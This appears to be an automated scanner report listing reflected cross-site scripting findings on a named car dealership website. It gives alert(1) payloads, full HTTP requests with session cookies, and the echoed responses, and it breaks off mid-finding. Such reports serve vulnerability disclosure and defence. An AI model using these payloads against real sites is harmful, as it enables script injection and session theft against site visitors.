HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:07:58 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:07:59 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:07:59 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16134
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Venza6d575<i ...[SNIP]... <H1> Toyota Venza6d575<img src=a onerror=alert(1)>24d756e20f2</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41a84"><img%20src%3da%20onerror%3dalert(1)>ee000ae3822 was submitted in the REST URL parameter 2. This input was echoed as 41a84"><img src=a onerror=alert(1)>ee000ae3822 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Venza41a84"><img%20src%3da%20onerror%3dalert(1)>ee000ae3822/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:04:51 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:04:51 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:04:52 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16155
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Venza41a84"> ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Venza41a84"><img src=a onerror=alert(1)>ee000ae3822 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Venza41a84"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7f40e'><img%20src%3da%20onerror%3dalert(1)>6fbc1bf8bf6 was submitted in the REST URL parameter 2. This input was echoed as 7f40e'><img src=a onerror=alert(1)>6fbc1bf8bf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Venza7f40e'><img%20src%3da%20onerror%3dalert(1)>6fbc1bf8bf6/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:06:24 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:06:25 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:06:25 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16158
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Venza7f40e'> ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Venza7f40e'><img src=a onerror=alert(1)>6fbc1bf8bf6'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97024"><img%20src%3da%20onerror%3dalert(1)>7d26f203fee was submitted in the REST URL parameter 2. This input was echoed as 97024"><img src=a onerror=alert(1)>7d26f203fee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Yaris97024"><img%20src%3da%20onerror%3dalert(1)>7d26f203fee/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:15:28 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:15:28 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:15:29 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16190
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Yaris97024"> ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Yaris97024"><img src=a onerror=alert(1)>7d26f203fee at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Yaris97024"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3e8bd<img%20src%3da%20onerror%3dalert(1)>1a28b592aab was submitted in the REST URL parameter 2. This input was echoed as 3e8bd<img src=a onerror=alert(1)>1a28b592aab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Yaris3e8bd<img%20src%3da%20onerror%3dalert(1)>1a28b592aab/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:18:17 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:18:17 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:18:18 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16104
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Yaris3e8bd<i ...[SNIP]... <H1> Toyota Yaris3e8bd<img src=a onerror=alert(1)>1a28b592aab</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6512f'><img%20src%3da%20onerror%3dalert(1)>4ee7694739 was submitted in the REST URL parameter 2. This input was echoed as 6512f'><img src=a onerror=alert(1)>4ee7694739 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Yaris6512f'><img%20src%3da%20onerror%3dalert(1)>4ee7694739/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:16:44 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:16:45 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:16:45 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16170
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Yaris6512f'> ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Yaris6512f'><img src=a onerror=alert(1)>4ee7694739'> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 591e9'><script>alert(1)</script>4c72ff10cba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /carresearch/BodystylesGroup/confid_fremonttoyota591e9'><script>alert(1)</script>4c72ff10cba/make_Toyota/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:06:14 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 05:06:15 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 31518
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>New Toyota Vehicles ...[SNIP]... <OPTION VALUE='/confid_fremonttoyota591e9'><script>alert(1)</script>4c72ff10cba/year_/make_Toyota/'> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload de9b1</title><script>alert(1)</script>c3de2be6687 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyotade9b1</title><script>alert(1)</script>c3de2be6687/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:09:41 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 05:09:42 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 14651
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>New Toyotade9b1</title><script>alert(1)</script>c3de2be6687 Vehicles - Fremont Toyota</TITLE> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7b26'><script>alert(1)</script>098fb43cbf3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyotad7b26'><script>alert(1)</script>098fb43cbf3/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:09:32 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 05:09:33 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 14543
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>New Toyotad7b26'><sc ...[SNIP]... <OPTION VALUE='/carresearch/BodystylesGroup/confid_fremonttoyota/year_/make_Toyotad7b26'><script>alert(1)</script>098fb43cbf3/'> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload d5870><script>alert(1)</script>4f330d97cd8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyotad5870><script>alert(1)</script>4f330d97cd8/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:09:35 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 05:09:36 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 14525
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>New Toyotad5870><scr ...[SNIP]... <IMG SRC=http://group.autofusion.com/images/toyotad5870><script>alert(1)</script>4f330d97cd8_logo.gif ALT="Toyotad5870> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7db85"><script>alert(1)</script>735a1ae63d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota7db85"><script>alert(1)</script>735a1ae63d/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:09:30 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 05:09:31 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 14525
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bcd61<script>alert(1)</script>de00dbdb85a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyotabcd61<script>alert(1)</script>de00dbdb85a/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:09:37 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 05:09:38 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 14507
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>New Toyotabcd61<scri ...[SNIP]... <TD CLASS="model_header" VALIGN=TOP> New Toyotabcd61<script>alert(1)</script>de00dbdb85a Models<BR> ...[SNIP]...
The value of the &VehicleType request parameter is copied into the HTML document as text between TITLE tags. The payload 9d9c7</title><script>alert(1)</script>fc484791137 was submitted in the &VehicleType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?&VehicleType=New9d9c7</title><script>alert(1)</script>fc484791137 HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:10:38 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 36905
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>New9d9c7</title><script>alert(1)</script>fc484791137 Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watsonville - Fremont California</title> ...[SNIP]...
The value of the &VehicleType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b21c2"><script>alert(1)</script>aaebb356997 was submitted in the &VehicleType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?&VehicleType=Newb21c2"><script>alert(1)</script>aaebb356997 HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:56:49 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 36805
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Newb21c2"><script>alert(1)</script>aaebb356997 Inventory Search - Fremont Toyota - Toyota - Se ...[SNIP]... <meta name="description" content="Search our online inventory for Newb21c2"><script>alert(1)</script>aaebb356997 cars at Fremont Toyota in Fremont, California! Call us today at (510) 252-5100, or visit us at 5851 Cushing Pkwy., Fremont, California 94538."> ...[SNIP]...
The value of the &VehicleType request parameter is copied into the HTML document as plain text between tags. The payload 1bafc<script>alert(1)</script>c71526176cb was submitted in the &VehicleType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?&VehicleType=New1bafc<script>alert(1)</script>c71526176cb HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:08:19 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 36736
The value of the Model request parameter is copied into the HTML document as text between TITLE tags. The payload 9d296</title><script>alert(1)</script>2ee433e8a41 was submitted in the Model parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?VehicleType?=New&Model=9d296</title><script>alert(1)</script>2ee433e8a41 HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:32:11 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 40043
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>9d296</title><script>alert(1)</script>2ee433e8a41 Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watsonville - Fremont California</title> ...[SNIP]...
The value of the Model request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a42a8"><script>alert(1)</script>0d87e64093f was submitted in the Model parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
